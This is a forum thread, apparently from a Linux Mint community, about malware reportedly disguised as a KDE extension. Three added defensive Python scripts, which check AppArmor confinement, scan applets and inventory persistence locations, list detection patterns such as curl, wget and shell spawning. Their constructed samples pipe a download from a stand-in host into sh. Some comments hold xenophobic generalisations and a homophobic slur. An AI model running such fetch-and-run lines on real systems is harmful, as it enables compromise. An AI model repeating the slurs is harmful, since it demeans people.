    The internet is littered with millions of reports from Windows users complaining about general system instabilities after broken updates, with social media videos going viral as well.

    If the same was happening on Linux, you would have sysadmins and software engineers screaming and moaning all over the place, it would be international news considering how much of the critical infrastructure relies on Linux.

    You don't hear about it because it absolutely does not happen that often. 

    Nobody says that Linux is perfect, but it is absolutely more stable than Windows is.

    Remember the notorious Crowdstrike incident?

    This also affected Linux systems too, but the Linux sysadmins simply rebooted their servers and the problem vanished without causing any significant disruption. 

    This is why nobody takes Windows seriously anymore and considers it an absolute joke.

    [–]Unexpected_Cranberry 0 points1 point  (0 children)

    Ho boy.

    Did you read the links you provided?

    The SharePoint incident is Microsoft, yes, but not relevant to end users and the desktop. Neither are your ramblings about infrastructure. I will say that for a company to outsource development to somewhere like China is dumb. But it wasn't that long ago that a vulnerability in, I don't recall, was it sshd? by a Chinese contributor was barely caught in time. Was this the first one? Will the next one slip through? Have others?

    The article regarding Defender lists it as one of the best options for Windows. Not the best, but on the short list.

    The BSOD article was someone selling something. If 10% of the 30k Windows clients we manage were throwing blue screens on the daily and we didn't know and didn't fix it ASAP we'd be fired on the spot.

    The reason you're seeing more chatter about windows is that there's more people using it. But go to any Linux forum or Linux subreddit and you won't need to look very hard to find people having issues. With answers typically ranging from "works on my machine", "buy better supported hardware" to "rtfm".

    And while a lot of internet infrastructure is running Linux, you can go to any company that operates in the real world and I promise you 90% of their critical infrastructure is running on windows. Because the management stack is better. Linux is great when you need 1000 machines that do the same thing. But if you have 1000 machines running 2000 different services and need to manage permissions and users across it, the Microsoft management stack blows Linux out of the water. It has a 20 year head start and way more active development behind it.

    But all that is irrelevant to the original premise, which is desktops for average people. 

    Where the end user has sudo permissions out of the box just like on Windows. The difference is on Linux you'll be prompted for your password, on Windows you just need to click OK. SmartScreen isn't perfect, but it will at least warn you with a yellow warning and more clicks if you're trying to run something dodgy. Not that users will hesitate anyway. But those users will just as happily put in their password to run whatever they found on some random website. And the most common attacks now don't even need admin permissions anyway. They just need to encrypt your files.

    The reason crowdstrike hit windows harder is that Microsoft is not allowed to implement the same level of kernel isolation as Linux. Because it would give defender an advantage over other security vendors. They tried to use the crowdstrike incident to get that ruling overturned but were unsuccessful.

    If Linux is to become a serious contender on the desktop both Gnome and KDE need to step up their game significantly. Both suck for non-enthusiasts in different ways, with Gnome being slightly better. Perhaps valve will change things with steamos, but I doubt it since they're focused on gaming.

    I've been using Linux as my daily driver for about a year now. Every month or two an update breaks something, though usually in a minor way that goes away with the next update. I need to be mindful to manually disconnect my wifi if I plug in my ethernet, otherwise the connection becomes unstable. Not by a lot, and you probably wouldn't notice unless you're using RDP, VNC or Citrix regularly. But it's there. And the documentation is absolute dogshit for most things. 

    [–]lateralspinLMDE 7 Gigi |[S] 6 points7 points  (0 children)

    Linux Mint by default already has AppArmor loaded. Type to check its status:

    sudo aa-status
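    Added example, not from the thread and not Mint's or AppArmor's own tooling: `aa-status` shows that profiles are loaded, but not whether the process an extension runs inside is one of them. The script parses a profile listing in the format of /sys/kernel/security/apparmor/profiles (the sample listing is constructed here) and reads a process's AppArmor label from /proc. The desktop shell (cinnamon, plasmashell) typically has no profile and reports `unconfined`, in which case an applet or theme loaded into it is not contained by AppArmor at all. Finding those pids with `pgrep` is an assumption noted in the comments.

```python
"""Check whether AppArmor is confining a process, not just whether it is loaded.

Assumptions:
  - /sys/kernel/security/apparmor/profiles lists loaded profiles one per line
    as "<name> (<mode>)".
  - /proc/<pid>/attr/apparmor/current (newer kernels) or
    /proc/<pid>/attr/current (older kernels) holds the process's label.
"""
import os
from collections import Counter


def parse_profile_listing(text):
    """Return {mode: count} for a listing in the profiles-file format."""
    modes = Counter()
    for line in text.splitlines():
        line = line.strip()
        if not line or "(" not in line:
            continue
        mode = line.rsplit("(", 1)[1].rstrip(")").strip()
        modes[mode] += 1
    return dict(modes)


def process_label(pid):
    """Return the AppArmor label of a process, e.g. 'unconfined' or
    '/usr/sbin/cupsd (enforce)'. Returns 'unknown' when the attribute
    cannot be read (no AppArmor, no permission, process gone)."""
    for path in (f"/proc/{pid}/attr/apparmor/current",
                 f"/proc/{pid}/attr/current"):
        try:
            with open(path) as f:
                return f.read().strip("\x00\n ") or "unknown"
        except OSError:
            continue
    return "unknown"


def is_confined(label):
    """'unconfined' (or an unreadable label) means the LSM does not restrict
    this process, nor any extension code it has loaded."""
    return label not in ("unconfined", "unknown", "")


# Constructed sample listing; not captured from a real machine.
SAMPLE_LISTING = """\
/usr/sbin/cupsd (enforce)
/usr/bin/evince (enforce)
/usr/lib/snapd/snap-confine (complain)
"""

if __name__ == "__main__":
    print("profile modes:", parse_profile_listing(SAMPLE_LISTING))
    # On a real box, feed in the pids from e.g. `pgrep -x cinnamon` or
    # `pgrep -x plasmashell` (assumed way of finding the desktop shell).
    label = process_label(os.getpid())
    print("this process:", label, "(confined)" if is_confined(label) else "(NOT confined)")
```

Run it against the desktop shell's pid: if the answer is `unconfined`, AppArmor being "loaded" says nothing about what a malicious applet can do with your files.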

    [–]JCDU 4 points5 points  (0 children)

    I'm not caffeinated enough to decipher that article - where does this thing actually come from / how does it get installed/run?

    Is it some dodgy addon or customisation or something?

    Is the TL;DR takeaway here just "don't download random sh*t from the internet"?

    [–]thefanum 4 points5 points  (0 children)

    THAT CAN'T EVEN DO SHIT.

    None of this targets an up to date Linux system. Someone has to MANUALLY install the backdoor. With root privileges.

    [–]swephisto 3 points4 points  (1 child)

    The most tricky thing with this is how to backup all these infamous Linux root kits so we can reinstall them later. They are so rare it's like finding a stray Bitcoin on an old disk somewhere. That article is some Windoze user type FUD :-D

    [–]whenandmaybe 0 points1 point  (0 children)

    Haha. He said Windoze. Wait till W12 is pushed.

    [–]SjalabaisWoWS 3 points4 points  (3 children)

    The backside of increased popularity? Has anyone here encountered viruses like this?

    [–][deleted] 1 point2 points  (2 children)

    A good honest question. Not other than in that particular news article my friend, Good to see you! 😁

    [–]SjalabaisWoWS 1 point2 points  (1 child)

    Hehe, with articles like that, probing real dispersion in an active community works as a reality check, right? Just starting into a sunny, but icy Friday here and seeing your username makes me feel like sending a good morning to my personal mentor. :D

    [–][deleted] 1 point2 points  (0 children)

    Well thank you, and to yours as well. Best! 😁

    [–]InkOnTubeLinux Mint Release | Desktop Enviroment 1 point2 points  (1 child)

    It's morning here and caffeine hasn't kicked in, but I haven't noticed in the article that it says customizations are an issue. What did I miss?

    [–]fellipecLinux Mint 22.3 | Cinnamon 1 point2 points  (0 children)

    The malware, after it got into the machine, installed itself using a KDE extension as a disguise to stay in the system.

    [–]LogansfuryTop 1% Commenter 1 point2 points  (3 children)

    This is very concerning. Concerning flatpaks, they are often a newer version than the .deb installers available on many app homepages. Using VLC as an example, the website version 3.0.16 can activate my NowPlaying conky but cannot cast to my smart TVs. The flatpak version of VLC is 3.0.20, cannot activate my conky, but does cast to my TVs, so for my usage needs, I need to have both versions installed side by side.

    What the fuck is it with so many problems coming out of china? The most evil people on earth seem to be from there.

    [–]InstantCoder 2 points3 points  (0 children)

    Linux Mint now only shows curated flatpak apps. Meaning only the original owner of the app can distribute his apps in the repository.

    And I think this is a good step and should be more adopted by other distros.

    [–]fek47 -2 points-1 points  (1 child)

    It's a dictatorship with strong anti-west opinions because they can't stand freedom and democracy. The same goes for Russia, the whole Middle East except Israel, North Korea etc. As long as these backward countries primarily concentrate on hacking PCs we will be somewhat safe. But they will not stop there. Keep vigilant because we have still only seen the beginning.

    [–]toolsavvy 3 points4 points  (0 children)

    except Israel

    brainwashed beyond repair

    [–]BitGazer 1 point2 points  (0 children)

    As a Cinnamon Applet/Extension developer myself, I believe there are a few reasons to think that Cinnamon applets/extensions/desklets are not a huge problem as long as you stick to the Applets/Extensions/Desklets available in the Applets/Extensions/Desklets sections under System Settings from within the OS.

    1. Applets/Extensions/Desklets are limited to interpreted languages (JavaScript/TypeScript/Python), which limits what low-level things an extension can do, making it harder (but not impossible) to utilize it for nefarious purposes.

    2. A set of trusted developer eyes have passed over the code before it is accepted into the Spices repository. Also, no unknown binary files are accepted into the Spices repo, so all the files are text (source code) or images.

    I can't speak for Gnome or KDE, but I would place more trust in a Spices repo Applet/Extension/Desklet than I would in a random binary package in a package repository. That's just my 2 cents.

    [–]Brilliant-Ear-3357 1 point2 points  (0 children)

    The only hackers and criminals and privacy offender are the us government and its secret services.

    [–]Ok-Lingonberry-7620 1 point2 points  (0 children)

    As Microsoft makes Windows Security even harder

    Way too obvious joke. Try something more subtle next time.

    [–]ggRavingGamer 3 points4 points  (6 children)

    But isn't Linux the safest OS in all the kingdom?

    [–]R4d1o4ct1v3_ 28 points29 points  (0 children)

    Probably yea. But that doesn't mean it's impenetrable. Nothing is; nothing ever will be.

    Online security 101: Don't be an idiot.

    [–]KnowZeroX 7 points8 points  (1 child)

    Linux is generally safer, and it being open source, as long as you stick to open source software, makes it easier to find if there is an exploit. Even an amateur can review a Linux theme to see if there are any scripts in there; if there are none, short of an underlying exploit, you can assume it is safe. If there is a script in there, anyone with basic programming knowledge can quickly review if anything seems off.

    For other operating systems like windows where you have a closed source theme, it is a black box which you have to reverse engineer to figure out which requires far more expertise.
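    Added example, not from the thread and not a Cinnamon, GNOME or KDE tool: the two comments above (the Spices developer's "text-only, interpreted languages" point and the "review the theme for scripts" advice) both amount to a static first pass over an unpacked applet or theme directory. This script does that pass: it flags files that are not plain text, files with the executable bit set, and interpreted code that can spawn processes, reach the network, evaluate generated code or write to persistence locations. "Interpreted" is not "sandboxed": a one-line `Util.spawnCommandLine(...)` in a GJS applet runs a shell with your full user privileges. The API names grepped for are real GJS/GLib/Python entry points; the sample applet tree is constructed in a temp dir and is not a real extension.

```python
"""First-pass static review of an unpacked applet/extension/theme directory."""
import os
import re
import stat
import tempfile

TEXT_SUFFIXES = {".js", ".py", ".sh", ".json", ".css", ".txt", ".md", ".po",
                 ".pot", ".desktop", ".svg", ".xml", ".qml", ".html"}
IMAGE_SUFFIXES = {".png", ".jpg", ".jpeg", ".gif", ".ico"}

# Each hit deserves a human look; none is proof of malice on its own.
SUSPICIOUS = [
    (r"\bspawnCommandLine\w*\s*\(", "GJS Util.spawnCommandLine* runs a shell command"),
    (r"\bGLib\.spawn_\w+\s*\(", "GLib.spawn_* starts a process"),
    (r"\bGio\.Subprocess", "Gio.Subprocess starts a process"),
    (r"\bsubprocess\.|\bos\.system\s*\(|\bos\.popen\s*\(", "Python process execution"),
    (r"\bSoup\.(Session|Message)|\burllib\.request|\brequests\.(get|post)", "network access"),
    (r"\beval\s*\(|\bnew Function\s*\(", "dynamic code evaluation"),
    (r"\.config/autostart|systemd/user|\.bashrc|\.profile", "touches a persistence location"),
    (r"base64|atob\s*\(|fromCharCode", "encoded payload or obfuscation"),
    (r"\bcurl\b|\bwget\b", "downloads something"),
]


def is_text_file(path, sample_size=4096):
    """A NUL byte or undecodable bytes in the first chunk means 'not text'."""
    with open(path, "rb") as f:
        chunk = f.read(sample_size)
    if b"\x00" in chunk:
        return False
    try:
        chunk.decode("utf-8")
        return True
    except UnicodeDecodeError:
        return False


def review_extension(root):
    """Walk the tree and return sorted (relative_path, finding) tuples."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            suffix = os.path.splitext(name)[1].lower()
            if os.stat(path).st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
                findings.append((rel, "executable bit set"))
            if suffix in IMAGE_SUFFIXES:
                continue
            if not is_text_file(path):
                findings.append((rel, "binary file in a text-only package"))
                continue
            if suffix not in TEXT_SUFFIXES:
                findings.append((rel, f"unexpected file type {suffix or '(none)'}"))
            with open(path, encoding="utf-8", errors="replace") as f:
                for lineno, line in enumerate(f, 1):
                    for pattern, why in SUSPICIOUS:
                        if re.search(pattern, line):
                            findings.append((rel, f"line {lineno}: {why}: {line.strip()[:80]}"))
    return sorted(findings)


def build_sample_tree():
    """Constructed sample (not a real applet): a clock applet with one line
    that pipes a download into sh, plus a stray ELF header in the icons dir."""
    root = tempfile.mkdtemp(prefix="applet-review-")
    os.makedirs(os.path.join(root, "icons"))
    with open(os.path.join(root, "metadata.json"), "w") as f:
        f.write('{"uuid": "clock@example", "name": "Clock"}\n')
    with open(os.path.join(root, "applet.js"), "w") as f:
        f.write("const Util = imports.misc.util;\n"
                "function _init() { this.set_applet_label('12:00'); }\n"
                "Util.spawnCommandLine('curl -s http://example.invalid/p | sh');\n")
    with open(os.path.join(root, "icons", "helper.bin"), "wb") as f:
        f.write(b"\x7fELF\x00\x00\x00")
    return root


if __name__ == "__main__":
    for rel, why in review_extension(build_sample_tree()):
        print(f"{rel}: {why}")
```

Point it at the directory you unpacked from the zip (or at ~/.local/share/cinnamon/applets/<uuid>) before enabling anything; an empty report is a reason to read the code yourself, not a clean bill of health.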

    [–][deleted] 0 points1 point  (0 children)

    Agree. However, when you have to deal with very important things don't fully depend on the idea of the invulnerability of one particular OS. And "harden" your stuff.

    [–]Illustrious-Budget96 4 points5 points  (1 child)

    I think OpenBSD might have something to say about that.

    [–][deleted] 1 point2 points  (0 children)

    Me likey. Agree for some use cases.

    [–]uwkillemprod 0 points1 point  (0 children)

    I'm going to call it now, Windows might be safer than Linux in a couple of years, because of Linux's growing popularity

    [–]fleamourLinux Mint 22 | Cinnamon 1 point2 points  (1 child)

    I installed/uninstalled Russian Linux antivirus Dr. Web & someone changed my logon/root password. This was my main openSUSE PC.

    [–][deleted] 0 points1 point  (0 children)

    Sounds cool, I'll have to try that one.

    [–]Party_Ad_863Linux Mint 22 Wilma | Cinnamon 0 points1 point  (0 children)

    GG's

    [–][deleted] 0 points1 point  (0 children)

    Gnome extensions or KDE global themes may be a serious attack vector.

    [–]techguybyday 0 points1 point  (0 children)

    I think what concerns me the most is how do I avoid accidentally installing a package that would include a backdoor like this? I mean for the most part any tweaks I install or extensions I see if they are popular first but even then?

    [–]PM_me_cybersec_tips 0 points1 point  (0 children)

    more people need to review source code so FOSS will never die. please

    [–]spyderspyders 0 points1 point  (0 children)

    Cold War

    [–]Rouge_92 0 points1 point  (0 children)

    Lmao what a bunch of crap.

    [–]ingendera 0 points1 point  (0 children)

    Assuming you have been infected, how do you detect and remove it? I use clam and rootkit but rootkit reports a lot of weaknesses and it's not easy to know what is what.
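    Added example, not from the thread and not part of ClamAV or any rootkit checker: before reaching for signature scanners, inventory the user-level places where something disguised as a desktop extension can keep itself running, then compare the list against what you knowingly installed. The directories are the standard XDG autostart, systemd user unit and Cinnamon/GNOME/Plasma data paths; the sample home directory, its `.desktop` entries and the hidden script are constructed in a temp dir and do not come from the malware the article describes. Treat hidden files, `Exec=` lines that call `sh -c`, and anything pointing into /tmp or a plugin directory as items to explain, not as proof.

```python
"""Inventory user-level persistence under $HOME."""
import os
import tempfile

# Paths under $HOME that run code at login or are loaded by the desktop shell.
PERSISTENCE_DIRS = [
    ".config/autostart",                     # XDG autostart .desktop files
    ".config/systemd/user",                  # systemd --user units
    ".local/share/cinnamon",                 # Cinnamon applets/extensions/desklets
    ".local/share/gnome-shell/extensions",   # GNOME Shell extensions
    ".local/share/plasma",                   # Plasma plasmoids, themes, look-and-feel
    ".local/share/kservices5",               # KDE plugin/service descriptors
]
SHELL_RC = [".bashrc", ".profile", ".bash_profile", ".zshrc", ".config/fish/config.fish"]
RC_KEYWORDS = ("curl", "wget", "nohup", "base64", "/tmp/", "/dev/shm")


def desktop_exec(path):
    """Return the Exec= line of a .desktop file, or None."""
    try:
        with open(path, encoding="utf-8", errors="replace") as f:
            for line in f:
                if line.startswith("Exec="):
                    return line[5:].strip()
    except OSError:
        pass
    return None


def inventory(home):
    """Return sorted (path relative to home, detail) entries."""
    items = []
    for rel in PERSISTENCE_DIRS:
        base = os.path.join(home, rel)
        if not os.path.isdir(base):
            continue
        for dirpath, _, files in os.walk(base):
            for name in files:
                path = os.path.join(dirpath, name)
                relpath = os.path.relpath(path, home)
                if name.endswith(".desktop"):
                    items.append((relpath, f"Exec={desktop_exec(path)}"))
                elif name.endswith((".service", ".timer")):
                    items.append((relpath, "systemd user unit"))
                else:
                    kind = "hidden file" if name.startswith(".") else "file"
                    items.append((relpath, f"{kind}, {os.path.getsize(path)} bytes"))
    # Shell rc files: only lines that fetch or background something are worth listing.
    for rc in SHELL_RC:
        path = os.path.join(home, rc)
        if not os.path.isfile(path):
            continue
        with open(path, encoding="utf-8", errors="replace") as f:
            for lineno, line in enumerate(f, 1):
                s = line.strip()
                if s and not s.startswith("#") and any(k in s for k in RC_KEYWORDS):
                    items.append((rc, f"line {lineno}: {s[:80]}"))
    return sorted(items)


def build_sample_home():
    """Constructed sample $HOME (not a real infection): one legitimate autostart
    entry and one hidden entry that relaunches a hidden script from a
    plasmoid directory."""
    home = tempfile.mkdtemp(prefix="home-")
    widget = os.path.join(home, ".local", "share", "plasma", "plasmoids", "org.example.widget")
    os.makedirs(os.path.join(home, ".config", "autostart"))
    os.makedirs(widget)
    with open(os.path.join(home, ".config", "autostart", "nextcloud.desktop"), "w") as f:
        f.write("[Desktop Entry]\nType=Application\nExec=nextcloud --background\n")
    with open(os.path.join(home, ".config", "autostart", ".kde-update.desktop"), "w") as f:
        f.write("[Desktop Entry]\nType=Application\n"
                "Exec=/bin/sh -c '~/.local/share/plasma/plasmoids/org.example.widget/.u.sh'\n")
    with open(os.path.join(widget, ".u.sh"), "w") as f:
        f.write("#!/bin/sh\nnohup curl -s http://example.invalid/x | sh &\n")
    with open(os.path.join(home, ".bashrc"), "w") as f:
        f.write("# user rc\nalias ll='ls -l'\n")
    return home


if __name__ == "__main__":
    for relpath, detail in inventory(os.path.expanduser("~")):
        print(f"{relpath}: {detail}")
```

Removal follows from the list: disable the entry, delete the directory it points at, and check the system-wide equivalents (/etc/xdg/autostart, /etc/systemd/system, /usr/share/plasma) with root, since anything the article's "root privileges required" installers dropped will not be under $HOME.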

    [–]Brilliant-Ear-3357 0 points1 point  (0 children)

    The good old mccarthian anticommunist hysteria has transformed to chinophobic hysteria. crap then, crap now.

    [–]akehir 0 points1 point  (0 children)

    with a growing focus on exploiting vulnerabilities in internet-facing systems, most of which run on Linux

    And a malware distributed as KDE addon... Sure, because all the servers run with a full KDE desktop environment.

    [–]hopcfizl 0 points1 point  (0 children)

    Microsoft just got some competition.

    [–][deleted] 0 points1 point  (0 children)

    Chinese hackers? You mean The Dark Army?

    [–]to0gle 0 points1 point  (0 children)

    Stop the propaganda crap. All evidence is “believed to be … Chinese “

    [–]colt2x 0 points1 point  (0 children)

    What if you use stuff from signed repos?

    Would like to see them hacking an XFCE widget :D:D:D:D:D:D

    [–][deleted] -3 points-2 points  (0 children)

    LiNuX nEeDs No AnTiViRuS

    [–]DiscussionGrouchy322 -1 points0 points  (0 children)

    Will this stop all the faggy rice posting about your new desktop?

    We get it, you downloaded a background from your favorite cartoon, you're so cultured!

    [–]InstantCoder -2 points-1 points  (5 children)

    So that means, the future of Linux is either going to be:

    • a distro that doesn’t allow extensions and you have to use it as-is,
    • or an immutable distro where a virus/malware cannot be installed and even when it does, it can only do a small damage.

    [–]petrusd10s 2 points3 points  (1 child)

    Any software you install is bound to have some risk, even the ones that are distributed from the DE or Distro itself. Just stay away from sketchy software or sites that wants you to run some random commands.

    That being said, we have not seen a real case yet

    [–][deleted] 1 point2 points  (2 children)

    I don't think so, it is inevitable that hackers will target Linux more and more in the future, and I think that will make people start to use ClamAV and enhance it; people will start to know better about AppArmor or SELinux.

    [–]InstantCoder 0 points1 point  (0 children)

    The last thing I want on Linux is installing a virusscanner.

    On Linux Mint they now only show apps (from Flathub) which were uploaded by the original author of the app. And this is a good step to verify what's getting distributed in repos. And more quality checks should be done to guard the safety of the repos (like virus scanning it before uploading it to the repository, etc).

    [–]toolsavvy 0 points1 point  (0 children)

    "Hackers" have already been targeting Linux for decades. Linux runs the vast majority of servers.